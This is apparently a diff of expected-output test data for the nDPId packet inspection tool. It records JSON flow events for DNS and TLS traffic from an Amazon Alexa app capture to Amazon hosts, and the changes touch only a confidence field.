+00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1490976186879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976186879,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6vpAAEARopOsECoBrBAq2AA1Id0AUTsIItGBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIgAENu8XXg=="} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} +00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} 
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1490976187242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976187242,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmNAAEARM1KsECrYrBAqAeoEADUAKipZJj0BAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1490976187508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976187508,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6w9AAEARon6sECoBrBAq2AA16gQAUSKUJj2BgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADoACwhwaXRhbmd1acASwC4AAQABAAAAOgAENu8csg=="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01705{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01705{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1490976195484,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195484,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WmRAAEARM1OsECrYrBAqATpWADUAKI0W4msBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
